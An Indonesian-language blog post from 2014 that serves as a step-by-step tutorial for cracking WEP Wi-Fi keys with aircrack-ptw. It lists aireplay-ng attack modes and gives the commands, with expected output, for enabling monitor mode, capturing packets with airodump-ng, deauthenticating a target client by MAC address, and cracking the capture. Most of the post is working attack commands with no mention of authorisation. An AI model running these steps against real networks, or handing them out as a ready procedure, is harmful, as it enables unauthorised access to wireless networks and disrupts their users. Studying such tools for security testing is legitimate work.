Sabtu, 04 Januari 2014

Aircrack

Aircrack-ptw  adalah  generasi  terbaru  setelah  aircrack-ng,  dimana  aircrack-ptw membutuhkan waktu yang lebih cepat untuk mendekripsi sebuah key dari suatu akses point, tetapi aircrack-ptw ini masih memerlukan komponen-komponen dari aircrackng, yaitu : airodump-ng untuk mengcapture paket dan aireplay-ng untuk melakukan berbagai serangan jika perlu,  misalnya  untuk memaksa  target  untuk mengenerate ARP request dan lain-lain.
Contoh serangan airepla-ng :
aireplay-ng  --deauth  15  -a  00:12:17:A7:AF:E4  -c  00:0F:3D:57:FD:C0
ath0
serangan  ini  untuk  memaksa  target  untuk  mengenerate  ARP  request.
Mode serangan yang lain adalah :
- deauth count : deauthenticate 1 or all stations (-0)
- fakeauth delay : fake authentication with AP (-1)
- interactive : interactive frame selection (-2)
- arpreplay : standard ARP-request replay (-3)
- chopchop : decrypt/chopchop WEP packet (-4)
- fragment : generates valid keystream (-5)
- test : tests injection and quality (-9)

mode serangan bisa diganti dengan menggunakan kode angka.

Langkah-langka penggunaan Aircrack-ptw
1. Configurasi wireless card

$ airmon-ng stop ath0
$ iwconfig
pastikan respon sistem sebagai berikut :
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor
mode enabled)
berikan command airmon-ng start wifi0 9, untuk
menjalankan wireless card pada channel tertentu

$ airmon-ng start wifi0 9

maka sistem harus merespon
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
(monitor mode enabled)
berikan command

$ ifconfig ath0 up
 
dan pastikan sistem harus merespon sebagai berikut :
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point:
00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

2. Jalankan Airodump-ng
 
airodump-ng --channel X --write prefix_for_capture_file
interface
$ airodump-ng --channel 3 --write tes ath0

data hasil capture akan ditulis dalam file tes, oleh
airodump-ng akan disimpan dengan nama tes-01.cap

3. Jalankan aireplay (optional)
Langkah ini dilakukan jika airodump-ng tidak mendapatkan
paket yang ditangkap, maka target dapat dipaksa untuk mengenerate
ARP request
aireplay-ng --deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0 ath0
deuth : jenis serangan
-a : BSSID akses point
-c : Mac Address target
15 : jumlah paket yang dikirim

4. Jalankan aircrack-ptw

$ aircrack-ptw tes-01.cap